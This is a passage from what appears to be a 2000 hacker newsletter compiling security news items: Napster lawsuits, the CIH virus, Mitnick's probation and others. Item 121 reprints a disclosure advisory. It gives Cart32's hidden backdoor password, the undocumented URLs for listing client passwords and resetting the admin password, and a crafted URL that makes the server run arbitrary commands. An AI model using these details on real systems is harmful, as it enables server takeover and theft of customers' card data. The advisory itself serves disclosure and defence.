1860, advertisement regulations apply, and you can get hauled up for defamation, libel or slander," said Annapurna Ogoti, of the law firm Nishit Desai Associates. @HWA 114.0 [HNN] Napster Backs 'Bizkit ~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 26th contributed by The Hex Limp Bizkit has taken on controversial Napster as a sponsor of its free summer concert tour. The groups lead singer said that Napster was all about getting his art to the people and criticized people who chose to try and stop that. Wired http://www.wired.com/news/business/0,1367,35881,00.html @HWA 115.0 [HNN] Dr. Dre Sues Students for Napster Use ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 26th contributed by root Rap artists Dr. Dre has filed suit against five universities and students for violating copyright laws by using Napster. the lawsuit did not specifically name any students or schools it left them open to be named later. The lawsuit seeks $100,000 per illegally copied work. In an unrelated story Dr. Dre has been sued by LucasFilm for using the trademark THX sound at the beginning of his album, even after being denied permission. (I guess it is Ok to steal other peoples work as long as they don't steal yours.) C|Net http://news.cnet.com/news/0-1005-200-1760313.html?tag Rap artist sues Napster, students By John Borland Staff Writer, CNET News.com April 25, 2000, 5:00 p.m. PT Rap artist Dr. Dre sued MP3-swapping firm Napster today, adding a new layer of legal woes to the already besieged company. But this time, the stakes are being raised: Dr. Dre also is targeting students at universities who are using the Napster software to download MP3 files, putting individual music listeners into the legal line of fire. It's the second lawsuit filed by musicians who say the controversial software is responsible for massive violations of their copyrights. Heavy metal band Metallica also is seeking to close Napster's digital doors. Dr. Dre demanded last week that Napster remove his work from its service. But the company refused, saying it could only remove individual users identified as copyright violators. In response, the artist is asking that the court shut down Napster and award damages of $100,000 per illegally copied work. That could amount to close to $10 million, according to the lawsuit. "Napster devised and distributes software whose sole purpose is to permit (the company) to profit by abetting and encouraging the pirating of the creative efforts of the world's most admired and successful musical artists," the suit reads. The young company, started last year by 19-year-old student Shawn Fanning, has thrown the music industry into a kind of panic. Fanning's software allows people to link their computers directly to each other to share their music collections without paying companies or artists for the songs. At any time, thousands of people are online, sharing hundreds of thousands of songs through Napster's directory. The Recording Industry Association of America (RIAA) was the first to take legal action, suing Napster late last year. Metallica joined this month but set its legal sights on three universities it said were responsible for their students' illegal use of the software. But Dr. Dre, whose real name is Andre Young, also trains the specter of legal responsibility directly on the students themselves. No individual students or universities were named in the version of Dr. Dre's suit filed today. Instead, it is serving as a kind of placeholder, noting that five schools and students will be named later. That could serve as an effective scare tactic, based on events of the past week. Already the three universities named in Metallica's lawsuits have blocked or sharply restricted use of Napster on their campuses. The threat of any other school or student being added to this new lawsuit could push other universities in the same direction and dissuade students from using the service. Dr. Dre himself released a terse explanation for his legal action. "I don't like people stealing my music," he said in a press release today. In a coincidence of the courts, Dr. Dre himself was sued for copyright infringement last week. George Lucas' LucasFilm contends that the artist used the trademarked THX sound, which appears before many movies, to open his most recent album, even after being denied permission. Dr. Dre's suit was filed in a Los Angeles federal court. (Dr. Dre fuck you, and fuck Metallica, quit listening to your lawyers and go hunt the real pirates, like buy a clue. - Ed ) @HWA 116.0 [HNN] Chernobyl Hits South Korea ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 27th contributed by root the Ministry of Information and Communication in South Korea has reported that it has received almost 2,000 complaints regarding the Chernobyl or CIH virus. last year CIH infected almost 300,000 systems in the country. ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2555878,00.html?chkpt Chernobyl virus nukes S. Korean PCs Thousands of small businesses and personal users had their hard drives cleaned out by the infamous CIH virus. By Reuters April 26, 2000 7:02 AM PT SEOUL -- The so-called Chernobyl computer virus struck South Korea on Wednesday, wiping out hard disks at hundreds of companies, the Ministry of Information and Communication said on Wednesday. The ministry reported it received almost 2,000 complaints about the virus, which struck on the 14th anniversary of the Chernobyl nuclear accident in the Ukraine. A ministry official said far worse damage was caused last year. "In 1999, the outbreak of the virus affected up to 300,000 computers, and larger companies took the brunt of the damage,'' said the official. ``This time, it's likely to be 5 percent of that.'' He said individuals and small companies accounted for more than 70 percent of the complaints reported on Wednesday. He gave no estimate of the value of the damage caused by the virus erasing data on hard disk drives and corrupting communications software. @HWA 117.0 [HNN] Russian Gas Supplier Invaded by Cyber Criminals ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 27th contributed by mr.big23 and William Knowles Gazprom, a huge state-run gas monopoly, was one of many targets hit by cyber criminals last year in Russia, officials have said. Acting with an employee at the company the criminals were able to bypass the company's security and gained access to the gas control systems. The report also registered 852 cases of computer crime in Russia in 1999, up twelve-fold from the year before. (This story sounds more like a convenient way to place blame on hackers over likely Russian mismanagement or corruption.) Associated Press - via Nando Times http://www.nandotimes.com/technology/story/body/0,1634,500197283-500270387-501418162-0,00.html Deceased Url @HWA 118.0 [HNN] G8 Plans Cyber Security Conference ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 27th contributed by root66 The Group of Eight major industrialized nations will hold a conference in Paris next month about how governments and companies should interact when confronted with cybercrime. The May 15-17 conference will be attended by representatives of 150 major private firms alongside delegations from G-8 states Italy, France, Britain, Germany, Japan, Russia, Canada and the United States. The conference's aim was to study the challenges to security and consumer confidence posed by new information and communication technologies. Associated Press - via San Jose Mercury News http://www.mercurycenter.com/svtech/news/breaking/internet/docs/467487l.htm Url died @HWA 119.0 [HNN] Cyber Crime Institute Established ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 27th contributed by mr.big23 Carnegie Mellon University has created a research institute this month dedicated prevention rather than response. (Yeah!) The Carnegie Mellon Institute for Survivable Systems will work with both the public and private sector and will use resources and people from the CERT coordination center. CNN http://www.cnn.com/2000/TECH/computing/04/26/cybersecurity/index.html Carnegie Mellon establishes anti-hacking institute April 26, 2000 Web posted at: 5:16 p.m. EDT (2116 GMT) By Richard Stenger CNN Interactive Writer PITTSBURGH, Pennsylvania (CNN) -- A Pennsylvania university created a research institute this month dedicated to fighting computer attacks like those that besieged major Web sites like eBay, Yahoo! and CNN.com in February. Unlike other computer network security R&D centers, the Carnegie Mellon Institute for Survivable Systems will solicit private as well as federal funds and concentrate on prevention rather than response, according to CMISS officers. The new research group, which will seek partnerships and fee-for-service arrangements with the public and private sectors, will draw resources and personnel from other Carnegie University facilities, in particular from the CERT Coordination Center. But unlike the CERT center, CMISS will not have restrictive limits on corporate money. The CERT center receives most of its money from U.S. agencies like the Department of Defense, the FBI and the IRS. And the federal government sets strict limits for private investment in the center, said Bill Pollack, a spokesman for CMU's Software Engineering Institute, the parent department of CERT and CMISS. "There's a limit on growth because of that. CMISS enables the Carnegie Mellon community to get all kinds of funding," Pollack said. CMISS hopes eventually to have an annual operating budget of $40 million, in large part funded by the private sector, he said. E-commerce businesses could be receptive to CMISS' research, considering sporadic attacks from an average teenager can cost them billions of dollars. "There hasn't been a good foundation of data available to help researchers understand the key factors that contribute to actual losses," said CMU Computer Science Dean James Morris, in a statement. The CERT center was created after the Morris Worm incident crippled about 10 percent of all computers on the Internet in 1988. Since then dozens of computer emergency response teams have sprung up, but they tend to focus on hacking breaches after the fact, according to CMISS. The new institute will try to solve network security problems before they have a broad impact. "Information assurance, as it's practiced today, is not a science. It remains largely ad hoc," said CMU Engineering Dean John Anderson, in a statement. CMISS has already earned praise from Sen. Rick Santorum of Pennsylvania. "Carnegie Mellon's ... effort will, for the first time, establish a public-private partnership that will help safeguard our national security," Santorum said in a statement. He chairs the U.S. Senate's task force on cybersecurity. @HWA 120.0 [HNN] Domain Lock Down Launched ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 27th contributed by mr.big23 Domain registrar Register.com Inc. Wednesday launched Domain Lock Down, a service that protects domain names from being hijacked. New service will be able to "locks" names at the registry level, which helps prevent unauthorized alterations to name server and registrar information and blocks deletions of a domain name for the length of the registration term. Internet News http://www.internetnews.com/bus-news/article/0,2171,3_348071,00.html Register.com Launches Domain Security Service By Carol King Domain registrar Register.com Inc. Wednesday launched Domain Lock Down, a service that protects domain names from being hijacked. With the new service, register.com (RCOM), "locks" names at the registry level, which helps prevent unauthorized alterations to name server and registrar information and blocks deletions of a domain name for the length of the registration term. As a result, customers using the service have greater security over their domain names and can reduce the risk of illegal tampering. The service costs $99 per name. In light of the recent hijacking incidences, register.com felt it was essential to provide customers' with peace of mind, according to Richard Forman, the company's president and chief executive officer. "Because a domain name is the key access point to the Internet, businesses cannot afford to suffer the effects of illegal domain tampering," he says. "By locking down a domain, register.com corporate services customers increase the security of their business." @HWA 121.0 [HNN] Backdoor Found in Shopping Cart Software ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 28th contributed by root66 Cerberus Information Security has found a secret password that allows someone connecting to a web site running "Cart32" shopping cart software to gain access to the server. The backdoor could reveal such data as credit card numbers, order information, and shipping addresses. McMurtrey-Whitaker which sells cart32 said that they will have a patch available next week. @Stake L0pht labs has issued its own fix for users who can not wait that long. Cerberus-infosec @Stake L0pht Labs Wired ZD Net http://www.cerberus-infosec.co.uk/advcart32.html http://www.l0pht.com/ http://www.wired.com/news/politics/0,1283,35954,00.html http://www.zdnet.com/zdnn/stories/news/0,4586,2556876,00.html Cerberus Information Security Advisory (CISADV000427) http://www.cerberus-infosec.co.uk/advisories.shtml Released : 27th April 2000 Name : Cart32 secret password Backdoor Affected Systems : Any Win32 based web server using Cart32 Issue : Attackers can run arbitary commands on the web server and/or gain access to credit card information. Authors : David Litchfield (mnemonix@globalnet.co.uk) and Mark Litchfield (xor-syst@devilnet.co.uk) Description *********** The Cerberus Security Team has discovered a serious security hole in McMurtrey/Whitaker & Associates, Inc's Win32 e-Commerce shopping cart, namely, Cart32 (http://www.cart32.com/) that can only be described as a blatant backdoor. Within cart32.exe, the main file that provides the cart's functionality, there is a secret hidden password that can be used to gain vital information such as other passwords and using these an attacker can modify the shopping cart's properties so that arbitary commands may be run on the server as well as gain access to customers' credit card details, shipping addresses and other highly sensitive information. Details ******* Within cart32.exe there is a secret backdoor password of "wemilo" (found at file offset 0x6204h) known internally as the Cart32Password. With knowledge of this password an attacker can go to one of several undocument URLs such as http://charon/scripts/cart32.exe/cart32clientlist and obtain a list the passwords for each Cart32 client. (A client is essentially a shop site). Although these passwords appear to be hashed they can still be used. For example they can be embedded in a specially crafted URL that will allow the attacker to prime the server to run an arbitrary command when an order is confirmed: http://charon/scripts/c32web.exe?TabName=Cart32%2B&Action=Save+Cart32%2B+Tab &SaveTab=Cart32%2B&Client=foobar &ClientPassword=e%21U%23_%25%28%5D%5D%26%25*%2B-a&Admin=&AdminPassword=&TabT oSave=Cart32%2B&PlusTabToSave= Run+External+Program&UseCMDLine=Yes&CMDLine=cmd.exe+%2Fc+dir+%3E+c%3A%5Cfile .txt This URL will set the cart's properties to spawn a shell, perform a directory listing and pipe the output to a file called file.txt on the root of the C: drive when an order is confirmed. After doing this the attacker would then create a spurious order and confirm it thus executing the command. (Please note that the above URL is pertinent only to an internal Cerberus server - password details and client info would need to be changed to reflect the site in question). Further to this the Cerberus Security Team has found what is, perhaps, a second backdoor. By going directly to the following URL http://charon/scripts/c32web.exe/ChangeAdminPassword it is possible to change the administrative password with out knowledge of the previous one. Solution ******** Cerberus recommends that the following steps be actioned immediately. Cerberus has tested this in their labs and the Cart functionality will not be broken by following these steps. 1) Download a Hex Editor such as UltraEdit (http://www.ultraedit.com) and edit cart32.exe changing the "wemilo" password to something else. This will address the first issue. 2) Because c32web.exe is the administration program for Cart32 only site administrators will need access to it. Set the NTFS permissions on this file so that only Administrators have access to it. This way anyone attempting to access this file to change the admin password will be prompted for an NT account and password. For other "servers" such as Windows 95 and 98 Cerberus recommends removing this file. Cerberus vulnerability scanner, CIS, has been updated to include checks for these issues and is available for free download from their website http://www.cerberus-infosec.com/ Vendor Status ************* Due to the severity and seriousness of this issue Cerberus, has taken the rare step of making this information publicly available before the vendor has provided a patch. This is not normally Cerberus policy, however, as we have provided fix/workaround information in this advisory we belive we are not putting customers at any risk they would not have otherwise been exposed to. About Cerberus Information Security, Ltd ******************************** Cerberus Information Security, Ltd, a UK company, are specialists in penetration testing and other security auditing services. They are the developers of CIS (Cerberus' Internet security scanner) available for free from their website: http://www.cerberus-infosec.com To ensure that the Cerberus Security Team remains one of the strongest security audit teams available globally they continually research operating system and popular service software vulnerabilites leading to the discovery of "world first" issues. This not only keeps the team sharp but also helps the industry and vendors as a whole ultimately protecting the end consumer. As testimony to their ability and expertise one just has to look at exactly how many major vulnerabilities have been discovered by the Cerberus Security Team - over 60 to date, making them a clear leader of companies offering such security services. Founded in late 1999, by Mark and David Litchfield, Cerberus Information Security, Ltd are located in London, UK but serves customers across the World. For more information about Cerberus Information Security, Ltd please visit their website or call on +44(0) 208 395 4980 Permission is hereby granted to copy or redistribute this advisory but only in its entirety. Copyright (C) 2000 by Cerberus Information Security, Ltd @HWA 122.0 [HNN] FBI Investigating AboveNet DoS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 28th contributed by root66 The FBI is investigating a denial of service attack that hit San Jose-based AboveNet Communications Inc. on Tuesday. According to AboveNet the attack was directed at a network device called a customer aggregation switch. The problem lies within AboveNet's methodologies as opposed to a vulnerability within the switch said a representative of AboveNet. ComputerWorld http://www.computerworld.com/home/print.nsf/(frames)/000427D962?OpenDocument&~f FBI investigates cyberattack against AboveNet By Ann Harrison 04/27/2000 As investigators continue to search for attackers who temporarily shut down eight e-commerce sites in February, another company was hit by a different type of denial-of-service attack Tuesday. The FBI is investigating a denial-of-service attack launched against San Jose-based AboveNet Communications Inc. that blocked traffic to almost a thousand content and service providers. FBI spokeswoman Deb Weierman said the bureau is looking into the AboveNet incident "to see what activity went on." However, she added that because it is an ongoing case, she couldn't divulge any details about the investigation. Unlike the earlier distributed denial-of-service attacks that flooded e-commerce sites with false data traffic, this attack was directed against a switch in AboveNet's network. AboveNet's Internet Service Exchange (ISX) network provides co-location services and Internet connectivity to companies such as NetZero Inc., CNet Inc. and America Online Inc., which wasn't affected by the outage. "This wasn't just a teen-ager with a $300 Linux machine. This was someone who had time to learn the trade," said Paul Vixie, senior vice president of Internet services at Metromedia Fiber Network Inc. in White Plains, N.Y., AboveNet's parent company. "It was certainly severe; most of our customers were impacted for a period of hours." According to Vixie, the attack was directed at a network device called a customer aggregation switch. The switch bundles co-location customers at the company's ISX facilities and links them to an Internet backbone as one high-speed connection. Vixie said the attack hit three switches at the company's ISX facilities in New York, Vienna, Va., and San Jose. The switch is made by Cisco Systems Inc., but Vixie said the exploit had nothing to do with a defect in the switch. He said the attacker exploited a flaw in the switch's configuration management process that the company has since changed. "There are certainly good and bad ways to do that. We thought we were using a good way, and (this week) we found out that we weren't," said Vixie. "The hole closed was in the process, not in the product." Stephen Northcutt, director of the Global Incident Analysis Center for the SANS Institute, declined to comment on the specifics of the AboveNet case. But he said the real problem isn't the attacks but what can be done about them. "We're focusing on the wrong thing," Northcutt said. "We're focusing on the actual attack. What we need to focus on are the systems that are being compromised every day." Vixie said he believes there is little opportunity for copycat attacks because of the unique methods AboveNet used to manage its network. The company suffered rolling outages from mid-morning Pacific time on Tuesday to mid-afternoon. According to Vixie, many customers had alternative carriers that ensured their network traffic got through — a common fail-over strategy for high-end customers. Very large customers, such as AOL, whose traffic wasn't funneled through the aggregation switch, weren't impacted. Vixie advised other information technology mangers who may be concerned with the management of their switches to consult with their vendors on proper switch management and configuration. He said swift action is also needed to deflect such attacks. Close network monitoring revealed the connectivity loss to customers, and AboveNet launched an investigation immediately. "We used brute force," said Vixie. "We called everyone in on the shift and went through the network with a fine-tooth comb, not only to get everyone back up online, but to make sure there were no time bombs." He added that no backdoors or other delayed exploits were detected. Vixie says the company has speculated widely as to the motive for the attack and concluded that it could have emerged from one of two "completely useless categories." One category includes competitors that the company took a customer away from, disgruntled former employees or customers who had been disconnected because they were spamming. The other category, said Vixie, includes "someone who has something to prove and wants to bring our network down and wants to brag about it." The denial-of-service attacks launched in February have proved difficult to trace because of the sheer volume of the attacks and the fact that targeted sites weren't able to capture attack data during the incident. But Vixie said the FBI has a reasonable chance of catching his company's attacker, partly because AboveNet has put resources into filtering, logging and traffic analysis. "We did not come away from (Tuesday's) experience completely ignorant," said Vixie. The February attacks against eight large e-commerce sites appeared to involve known attack tools such as Tribe Flood Network and Trinoo, which use co-opted machines to send a storm of packets against targeted sites (see story). Vixie said that because of the ongoing investigation, he couldn't say whether known exploits were used in the AboveNet attack. A 15-year-old Canadian, who allegedly calls himself Mafiaboy, was arrested April 15 by the Royal Canadian Mounted Police and charged in connection with a February denial-of-service attack against the CNN Web site. He was charged with two counts of mischief to data, but security analysts believe he likely wasn't responsible for the other attacks (see story). An investigation is ongoing, but no other suspects have yet been named. Brian Sullivan contributed to this story. @HWA 123.0 [HNN] Intel Removes ID Feature From New Chips ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 28th contributed by Evil Wench Intel has decided to remove the controversial ID-tracking technology from its next generation PC processor. The ID was included in Pentium III chips as a way to help facilitate e-commerce solutions. Intel says the increase in the technology of digital signatures lead them to this decision. (Yeah, the bad press and the boycott had nothing to do with it.) ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2556671,00.html?chkpt Intel disables ID tracking in new chips There was a firestorm of protest when Intel put ID-tracking technology in Pentium III chips. Now it's obsolete and being removed. By Robert Lemos, ZDNet News April 27, 2000 12:40 PM PT Intel Corp. says it plans to remove the controversial processor-ID technology from its next-generation PC processor and from future processors, ending a year-long battle with privacy advocates over the invasive technology. "We made the decision earlier this year," said George Alfs, a spokesman for Intel (Nasdaq: INTC) said Thursday. "We are not planning for (the chip ID) in our next processor." Alfs said the rise of digital-signature technology has made the need for chip IDs obsolete. As first reported on ZDNet News more than a year ago, the inclusion of the chip ID in the Pentium III processor touched off a heated controversy with privacy advocates denouncing the technology as an attempt to track users on the Internet. Calls for boycott Originally, Intel intended to ask PC makers to ship machines with the processor ID "on" -- that is, accessible to software -- but later changed tack by supplying a utility to customers to turn the feature on and off. Still not satisfied, however, privacy advocates and policy analysts called for a boycott of the chip maker. The boycott may have gone a long way to decide the issue, said Jason Catlett, president of pro-privacy Junkbusters Corp. "The thing that I am very glad didn't happen was for the feature to go into the food chain of the operating system, browser and e-commerce sites. The boycott probably cut off a lot of the proliferation that could have happened." Intel, however, said privacy arguments were less of a factor in the decision than digital-signature technology. "The technology has moved quite quickly," Alfs said. "With digital signatures you can do a lot of the functions that we had envisioned doing with the processor serial number." Its uses could have included authenticating customers for e-commerce, secure network management and secure e-mail. Security features panned However, some security experts and privacy advocates said the chip could not really add such security features at all. "Unfortunately, it doesn't do any of these things," wrote Bruce Schneier, president of Counterpane Internet Security Inc. in a ZDNet column. "If a remote Web site queries a processor ID, it has no way of knowing whether the number it gets back is a real ID or a forged ID." Intel won't stop adding security features, however. Its current motherboard chip sets include a random-number generator, which helps strengthen software encryption on the PC. That will stay, Alfs said. Don't look for any more boycotts, however. Privacy proponents love stronger encryption. @HWA 124.0 [HNN] Another HotMail Hole Patched ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 28th contributed by William Knowles Microsoft has patched yet another HotMail hole. This one used JavaScript to launch fraudulent password entry screens to trick people into entering their passwords to their accounts. C|Net http://news.cnet.com/news/0-1005-200-1772642.html?tag Microsoft zaps Hotmail password bug By Paul Festa Staff Writer, CNET News.com April 27, 2000, 12:30 p.m. PT Microsoft has patched a Hotmail bug that left users of the Web-based email service vulnerable to a password-stealing trick. The exploit was the latest in a series devised by bug hunters using JavaScript to launch fraudulent password entry screens to trick people into handing over control of their accounts. JavaScript is a Web scripting language designed to take actions on a Web site visitor's computer, such as launching a new window or scrolling text across the screen, without the visitor's interaction. After the first few password-stealing schemes came to light, Hotmail and other Web email providers decided to filter JavaScript from incoming messages. But bug hunters have kept themselves busy finding ways to sneak the code around Hotmail's filters. In the example addressed by Hotmail this week, Bulgarian bug hunter Georgi Guninski demonstrated a way to inject JavaScript through a style tag. The exploit worked only with Microsoft's Internet Explorer browser. In response to news of the bug, Microsoft this week patched the Hotmail servers. @HWA 125.0 [HNN] Iron Feather Collection at Risk ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 28th contributed by ifj On April 23rd, Iron Feather and his wife Hanna Banana were fined at a I-80 weigh station for transporting over 7,000 pounds of underground zines. The weight of the printed material, the largest collection of underground magazines in the world, caused their truck to be severely overweight. Iron Feather & Hanna were detained until a $300 penalty could be paid and the 7,000 pounds could be off loaded. Since their collection is considered one of the nation's top archive of underground zines they hope to retrieve the impounded storage from Nebraska this summer. Iron Feather said, "Even thou we lost our savings on fines and we had to store the huge collection of underground publications at a Nebraska locker we will not let them or anyone impair our mission, to preserve & report on the cybertekpunk cultures." Iron Feather Journal http://ironfeather.com @HWA 126.0 [HNN] Rubicon This Weekend, H2K Announcement ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 28th contributed by RijiLV and macki The con in MotorCity, Rubicon will be taking place this weekend. They will be having speakers such as Richard Thieme, Tim Crothers, TDYC!, Peter Stephenson and others. Rubi-con H2K KEYNOTE SPEAKER Hope2000 has announced that their keynote speaker will be Jello Biafra, former lead singer of the Dead Kennedys and currently with Lard. Over the years, Jello has become an outspoken critic of censorship and the mass stupidity that embraces our culture. It's a world those in the hacker community are quite familiar with. The keynote is scheduled for Saturday, July 15 at noon. H2K will run from July 14-16, 2000. Hope 2000 HNN Cons Page http://www.rubi-con.org http://www.h2k.net @HWA 127.0 [HNN] Laptop Issues Justice in Brazil ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 28th contributed by Zorro A Visual Basic software program known as 'Electronic Judge' is being used on the streets of Brazil to assist in dispensing justice. The software is installed on a laptop carried by a real judge who can then use the software to help asses the situation and even issue sentences on the spot. The software is currently being tested by three judges in Espirito Santo in Brazil. BBC http://news.bbc.co.uk/hi/english/sci/tech/newsid_726000/726837.stm Wednesday, 26 April, 2000, 18:02 GMT 19:02 UK Laptop is cyber judge and jury Brazilian police at a protest An artificial-intelligence program called the Electronic Judge is dispensing justice on the mean streets of Brazilian cities. The program is installed on a laptop carried by a roaming human judge and helps to assess swiftly and methodically witness reports and forensic evidence at the scene of an incident. It then issues on-the-spot fines and can even recommend jail sentences. I know that this is a little bit different, but it works Judge Pedro Valls Feu Rosa The software is being tested by three judges in the state of Espirito Santo. It is part of a scheme called Justice-on-Wheels, which is designed to speed up Brazil's overloaded legal system by dealing immediately with straightforward cases. Most people are happy to have the matters sorted out on the spot, says the program's creator, Judge Pedro Valls Feu Rosa, who sits in the state's Supreme Court of Appeals. He adds that the idea is not to replace judges but to make them more efficient. Pure logic After police alert the rapid justice team to minor accidents, they can be on the scene within 10 minutes. Most cases require only simple questions and no interpretation of the law - the decision-making process is purely logical, Judge Feu Rosa claims in New Scientist magazine. The program, written in the Visual Basic language, presents the judge with multiple choice questions, such as "Did the driver stop at the red light?" or "Had the driver been drinking alcohol above the acceptable limit of the law?" The Electronic Judge asks questions . . . These sorts of questions need only yes or no answers, says Judge Feu Rosa: "If we are concerned with nothing more than pure logic, then why not give the task to a computer?" He notes that the program gives more than a simple judgement: it also prints out its reasoning. If the human judge disagrees with the decision it can simply be overruled. He admits, however, that some people who have been judged by the program do not realise that they have been tried by software. . . . . and then delivers judgement. It could be some time before a similar system takes the place of an English court. "It would have to satisfy the authorities that it was absolutely foolproof first," says a spokesman for the Lord Chancellor's office, which oversees courts in England and Wales. But it could be put to use in the US, where Judge Feu Rosa says he is in discussion with insurance companies to set up a mobile system to resolve disputes over traffic accidents. @HWA 128.0 [HNN] CCPA and ECPA not Applicable ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 28th contributed by project3 Kevin Giger of Highland, Illinois, was charged in Madison County Circuit Court this week with computer tampering. Giger is accused of altering the Web site of the Holiday Inn Express in Highland. Giger's bail has been set at $15,000. The interesting part of this case is the courts orders to the cable company which provided Internet access for Mr. Giger. It is hard to interpret the legalese but it would seem that the court in this case felt that the Electronic Communications Privacy Act," 18 U.S.C. 2703 and the "Cable Communications Policy Act," 47 U.S.C. 551 for some reason did not apply. Highland Third Judicial Circuit Madison County, Illinois http://dreamwater.com/highland/ http://www.dreamwater.com/highland/order.htm @HWA 129.0 [HNN] McAfee Redefines Trojan ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 28th contributed by medic A Trojan or Trojan Horse has traditionaly been a piece of software that executes malicious code while looking benign. Now a denial of service tool has been labeled a 'Trojan virus' by McAfee. While the software in question can potentially be malicious that is its intended purpose, it is not trying to hide anything. This willful morphing of definitions by vendors makes it a little difficult for the rest of us. NAI http://vil.nai.com/villib/dispvirus.asp?virus_k @HWA 130.0 [HNN] Mitnick Back in Court ~~~~~~~~~~~~~~~~~~~~~~~~~~~ May 1st contributed by Macki The federal probation department has notified Kevin Mitnick's probation officer that Kevin can no longer give lectures relating to technology issues. Kevin feels that this is a direct violation of his first amendment rights. The Associated Press has quoted a figure of $20,000 worth of speaking engagements scheduled through August. Mitnick and his lawyer, Los Angeles criminal defense lawyer Sherman Ellison, will attempt to convince Judge Pfaelzer that Kevin should be allowed to speak. Associated Press Security Focus C|Net - Interview with Mitnick Regarding this latest government tactic http://dailynews.yahoo.com/h/ap/20000428/tc/computer_hacker_1.html http://www.securityfocus.com/news/23 http://news.cnet.com/news/0-1005-200-1781398.html?tag Mitnick Muzzled Ex-hacker plans his return to court after his ban on computing is extended to speaking and writing. By Kevin Poulsen April 25, 2000 2:13 AM PT Kevin Mitnick has been yanked off the lecture circuit and ordered by the U.S. Probation Office to halt his professional writing efforts, a move that left a recent Salt Lake City computer conference without its star speaker, and magazine publisher Steven Brill short one media critic for his upcoming web offering. "In regards to the numerous requests you have received concerning writing and critiquing articles and speaking at conferences, we find it necessary to deny your participation and recommend that you pursue employment in a non-related field," reads an April 12th letter to Mitnick from the Ventura, California U.S. Probation Office that supervises him. "Right now, I've retained counsel to go ahead and try to get this clarified," Mitnick said Monday. "I'm surprised, because all I was trying to do through my writing and speaking was to tell people how information security is important." Mitnick is arguably the world's most well-known hacker. His current notoriety came after he cracked a string of computers at cell phone companies, universities and ISPs. He pleaded guilty in March, 1999 to seven felonies, and was released from prison on January 21st, 2000 after nearly five years in custody. In February, Mitnick testified before a Senate committee about U.S. government computer security. The same month, he wrote a five-hundred-word commentary for Time Magazine opining on the high-profile denial of service attacks that briefly struck down some of the most widely used e-commerce sites on the web. 'I'm helping to protect people from the very conduct that I was once engaged in' -- Kevin Mitnick A disclaimer under his article noted that it "should not be construed as technical advice of any kind," a nod to special restrictions federal judge Marianna Pfaelzer handed Mitnick as part of a 1997 sentence for cell phone fraud. Under that ruling, Mitnick is not only banned for three years from using computers, cell phones and the Internet, but he's barred from acting "as a consultant or advisor to individuals or groups engaged in any computer related activity," without the permission of the U.S. Probation Office. Until this month, the Probation Office apparently didn't interpret that broad order -- which was upheld by an appeals court in 1998 -- as an obstacle to Mitnick's career ambitions. "I wanted to work on a book," says Mitnick. "I wanted to work in these speaking engagements and articles, and it was something that was satisfying to me and something I could do" without using computers. One source says that Mitnick had as much as $20,000 worth of speaking engagements scheduled through August, when the April 12th decision put his plans in limbo, and forced him to cancel a scheduled appearance last week on an information security panel in Salt Lake City, Utah. Brill's Discontent Mitnick said he warned organizers of the Utah NetTrends 2000 computer conference from the start that his appearance would hang on the Probation Office's approval, and he's miffed that a press release issued by the conference incorrectly claimed that a last minute court ruling caused the cancellation. In addition to speaking engagements, Mitnick had been entertaining more offers to write for a variety of newspapers, magazines and web sites, and had agreed to author a monthly column for Contentville, an e-commerce site set to begin reviewing and selling books and magazines this summer. "I wanted Kevin to write about consumer computer magazines," said Michael Hsu, the Contentville editor who recruited Mitnick. "His situation, where he can't touch computers or use cell phones, is unique, and I thought he could bring an interesting perspective. "From what I've been told about it, [the restriction] doesn't make any sense, and I think if he has the legal resources he should be able to challenge it successfully," said Steven Brill, Editor in Chief of the media watchdog magazine Brill's Content, and founder of Contentville. Brill said it's one thing to prevent a defendant from profiting from his crimes... "It's quite another thing to say he can't talk to anyone about anything. It just doesn't make any sense," said Brill, who still holds some hope that Mitnick will be writing for Contentville. "If he is not going to be able to do it, I'd be very disappointed," "The government can impose any restrictions so long as they are reasonably related to sentencing goals, and are no more restrictive then necessary," says Eugene Volokh, a UCLA Law School professor and expert in First Amendment issues. "Off the top of my head, it's hard for me to imagine how banning him from writing about computer magazines is consistent with those goals. But I haven't heard the probation officer's point of view" Reginald Valencia, Supervising United States Probation Officer, said office confidentiality rules prevent him from commenting on the case. "Not in any shape manner or form could I discuss it," said Valencia. Volokh notes that sentencing judges and probation officers are generally afforded great discretion in imposing supervision restrictions. Mitnick acknowledges his chances are poor if he takes his fight up to the appellate courts, but he adds that he and his new attorney, Los Angeles criminal defense lawyer Sherman Ellison, don't plan on entering Judge Pfaelzer's courtroom sprouting case law and statutes. "I'm helping to protect people from the very conduct that I was once engaged in," said Mitnick. "We're going to go in there and explain to the judge that this is good for the public and good for my rehabilitation." @HWA 131.0 [HNN] MI5 To Build Email Eavesdropping Center ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ May 1st contributed by Weld Pond British security agency MI5 will be constructing a 25m email surveillance center to monitor all emails sent and received in Britain. While law enforcement will still need Home Office approval to actually read emails and other messages officials say the center is need in the fight against online crime. the new center will be called GTAC, Government Technical Assistance Centre and will be operational by the end of the year. Sunday Times http://www.sunday-times.co.uk/news/pages/sti/2000/04/30/stinwenws01034.html MI5 builds new centre to read e-mails on the net Nicholas Rufford MI5 is building a new £25m e-mail surveillance centre that will have the power to monitor all e-mails and internet messages sent and received in Britain. The government is to require internet service providers, such as Freeserve 